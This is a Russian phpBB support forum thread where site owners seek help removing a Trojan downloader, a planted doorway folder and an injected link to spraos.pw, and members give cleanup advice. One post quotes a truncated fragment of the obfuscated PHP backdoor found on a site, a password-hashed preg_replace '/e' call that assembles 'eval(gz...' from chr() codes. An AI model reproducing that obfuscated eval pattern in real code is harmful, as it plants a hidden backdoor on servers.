Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- phpBB 1.4.4
- Сообщения: 110
- Стаж: 13 лет 1 месяц
- Откуда: CCCР. Ленинград
- Благодарил (а): 31 раз
- Поблагодарили: 5 раз
Re: Касперский видит вирус
Запрашиваемый веб-адрес не может быть предоставлен
Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26
Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....
Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26
Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....
-
- Former team member
- Сообщения: 2214
- Стаж: 20 лет 1 месяц
- Откуда: {postrow.POSTER_FROM}
- Поблагодарили: 68 раз
Re: Касперский видит вирус
покажите содержимое этого файла. Кто устанавливал, откуда и зачем?AdmninsCluba писал(а):73dce75b0ef045f77e443a1beae076ff.php
//
// That's all, Folks!
// -------------------------------------------------
// That's all, Folks!
// -------------------------------------------------
-
- phpBB 1.4.4
- Сообщения: 106
- Стаж: 13 лет 4 месяца
Re: Как убить Трояна?
ко мне на сайт залили шелл
кто нибудь сталкивался?
кто нибудь сталкивался?
Последний раз редактировалось папа 14.05.2013 16:13, всего редактировалось 1 раз.
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Это не шелл, а дорвей.
Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...
Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...
-
- phpBB 1.4.4
- Сообщения: 106
- Стаж: 13 лет 4 месяца
-
- phpBB 1.4.1
- Сообщения: 46
- Стаж: 12 лет 3 месяца
- Откуда: Кемерово
- Благодарил (а): 1 раз
Проверка сайта на дыры
Здравствуйте.
Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.
Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.
-
- phpBB 2.0.16
- Сообщения: 1097
- Стаж: 16 лет 3 месяца
- Откуда: root/world/russia/
- Благодарил (а): 17 раз
- Поблагодарили: 24 раза
Re: Проверка сайта на дыры
Открываете исходный код страницы, где касперыч ругается, в браузере и ищите по "spraos.pw" если находите, то смотрите где размещена ссылка, далее удаляете ее из файлов форума (тут уже в зависимости от того где ссылка встраивается).
Меняете пароли на хосте, проверяетесь на вирусы и т.п.
Заодно проверьте для профилактики htaccess в корне сайта
Меняете пароли на хосте, проверяетесь на вирусы и т.п.
Заодно проверьте для профилактики htaccess в корне сайта
Мои моды:
Полноценный интернет-магазин для phpbb3
Белый список IP для пользователей индивидуально
Парсер сообщений (автозамена)
User FAQ (Пользовательский FAQ)
Google Map MOD 0.4.2 [RUS]
Anti Double IP - Запрет множественных рег с одного IP
PM All in 1 - ЛС "Все включено"
Шкала последней активности пользователя
Поддержка только в указанных темах! В ЛС только по личным вопросам или за WM.
Полноценный интернет-магазин для phpbb3
Белый список IP для пользователей индивидуально
Парсер сообщений (автозамена)
User FAQ (Пользовательский FAQ)
Google Map MOD 0.4.2 [RUS]
Anti Double IP - Запрет множественных рег с одного IP
PM All in 1 - ЛС "Все включено"
Шкала последней активности пользователя
Поддержка только в указанных темах! В ЛС только по личным вопросам или за WM.
-
- phpBB 1.4.1
- Сообщения: 46
- Стаж: 12 лет 3 месяца
- Откуда: Кемерово
- Благодарил (а): 1 раз
Re: Проверка сайта на дыры
Garret_Dark, в том то и дело что нигде нет упоминания ссылки, искал уже. Ссылка зашифрована типа так
Код: Выделить всё
<?php
$auth_pass='818d0a0fd60532d7453a2b314167e6ef';preg_replace("/.*/".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Проверка сайта на дыры
Есть вот такой вот "сканер": http://www.revisium.com/ai/
Для борьбы со школьниками вполне подходит.
Для борьбы со школьниками вполне подходит.
-
- phpBB 1.4.1
- Сообщения: 46
- Стаж: 12 лет 3 месяца
- Откуда: Кемерово
- Благодарил (а): 1 раз
Re: Как убить Трояна?
Нашел где этот вирус сидел, на сайте стоял вордпресс и опенкарт в качестве магазина. Магазин не пользовался и просто лежал на хостинге, даже был переименован в shop1. Переименовал каталог с магазином и касперский перестал ругаться.
Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.
Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.
-
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Вот есть новый интересный сервис. http://webimho.ru/topic/5975/
Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме
Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Школьникам стало нечего делать. Пошли спасать мир, не иначе.
Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.
Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.
-
- phpBB 1.4.1
- Сообщения: 46
- Стаж: 12 лет 3 месяца
- Откуда: Кемерово
- Благодарил (а): 1 раз
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз